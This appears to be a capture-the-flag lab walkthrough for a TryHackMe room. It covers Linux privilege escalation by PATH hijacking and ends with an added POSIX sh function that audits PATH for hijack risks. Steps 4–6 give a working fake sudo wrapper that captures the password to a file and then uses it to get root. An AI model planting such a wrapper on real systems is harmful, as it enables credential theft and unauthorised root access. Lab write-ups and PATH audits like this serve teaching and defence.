THM “Eavesdropper” Room — Complete Walkthrough

Step 1: SSH Access

bash

# Save provided private key
echo '-----BEGIN OPENSSH PRIVATE KEY-----...' > frank_key
chmod 600 frank_key
# Connect to target
ssh -i frank_key frank@<TARGET_IP>

Step 2: Initial Check

bash

# Check sudo privileges
sudo -l
# Shows no sudo access for frank

Step 3: Find Attack Vector

The room hints at “listening closely” — use process monitoring:

bash

# Get pspy64 (in AttackBox it's already in /opt)
cd /tmp
# Or download: wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64
# Monitor processes
./pspy64

Observation: Root periodically runs sudo cat /etc/shadow

Step 4: PATH Hijacking Setup

bash

# Create malicious directory
mkdir /tmp/hack
# Add to PATH (first position)
export PATH="/tmp/hack:$PATH"
# Create fake sudo script
cat > /tmp/hack/sudo << 'EOF'
#!/bin/bash
read -s password
echo "$password" > /tmp/pass.txt
echo "$password" | /usr/bin/sudo -S "$@"
EOF
chmod +x /tmp/hack/sudo

Step 5: Wait for Capture

bash

# Wait 3-5 minutes for cron job
sleep 300
# Check for captured password
cat /tmp/pass.txt

Step 6: Privilege Escalation

bash

# Use captured password
su root
# Enter password from pass.txt
# Or
echo "$(cat /tmp/pass.txt)" | sudo -S bash

Step 7: Get Flag

bash

cat /root/flag.txt
# Flag: THM{...}

Why This Works:

  1. Root’s cron runs sudo cat /etc/shadow
  2. System finds our fake /tmp/hack/sudo first in PATH
  3. Fake sudo captures password, saves it, passes to real sudo
  4. We use captured password to become root

Time to complete: ~10 minutes
Difficulty: Medium
Key lesson: PATH variable manipulation can lead to credential theft
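
The defender's side of "Why This Works", as an added example that is not part of the original walkthrough: a POSIX sh function that audits a PATH string for relative entries, group- or world-writable directories, untrusted directories placed ahead of system ones, and a command whose first match lies outside a trusted list. The function names, finding labels and the default trusted-directory list are assumptions made for this example.

```sh
#!/bin/sh
# Added example, not from the walkthrough: audit a PATH string for hijack risk.
# Assumes a stat(1) that supports -c (GNU coreutils or BusyBox).
# Usage: audit_path sudo            (audits the current $PATH)

# Assumed allow-list of root-managed binary directories; adjust per host.
TRUSTED_DEFAULT="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

is_trusted() {  # is_trusted DIR TRUSTED_LIST
    case ":$2:" in *":$1:"*) return 0 ;; *) return 1 ;; esac
}

# audit_path CMD [PATH_STRING] [TRUSTED_DIRS]
# Prints one finding per line; status 1 if any. Subshell body keeps IFS local.
audit_path() (
    cmd=$1 path_str=${2:-$PATH} trusted=${3:-$TRUSTED_DEFAULT}
    found=0 resolved=0 last_trusted=0 i=0
    IFS=:; set -f; set -- $path_str; set +f; unset IFS

    # Pass 1: last trusted position; untrusted entries ahead of it can shadow sudo.
    for dir in "$@"; do
        i=$((i + 1))
        if is_trusted "$dir" "$trusted"; then last_trusted=$i; fi
    done
    i=0
    for dir in "$@"; do
        i=$((i + 1))
        case $dir in
            /*) ;;
            *) echo "RELATIVE_ENTRY '$dir'"; found=1; continue ;;  # '' means cwd
        esac
        if is_trusted "$dir" "$trusted"; then dir_ok=1; else dir_ok=0; fi
        if [ "$dir_ok" -eq 0 ] && [ "$i" -lt "$last_trusted" ]; then
            echo "UNTRUSTED_BEFORE_SYSTEM $dir"; found=1
        fi
        [ -d "$dir" ] || continue
        mode=$(stat -c '%a' "$dir")
        # Group- or other-writable: other accounts can plant executables here.
        if [ $(( 0$mode & 022 )) -ne 0 ]; then
            echo "WRITABLE_DIR $dir (mode $mode)"; found=1
        fi
        # Only the first hit counts: that is the file the shell would run.
        if [ "$resolved" -eq 0 ] && [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            resolved=1
            [ "$dir_ok" -eq 1 ] || { echo "UNTRUSTED_RESOLUTION $cmd -> $dir/$cmd"; found=1; }
        fi
    done
    exit "$found"
)
```

Run against the PATH from Step 4, it would report /tmp/hack as an untrusted entry ahead of the system directories and sudo as resolving to /tmp/hack/sudo.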
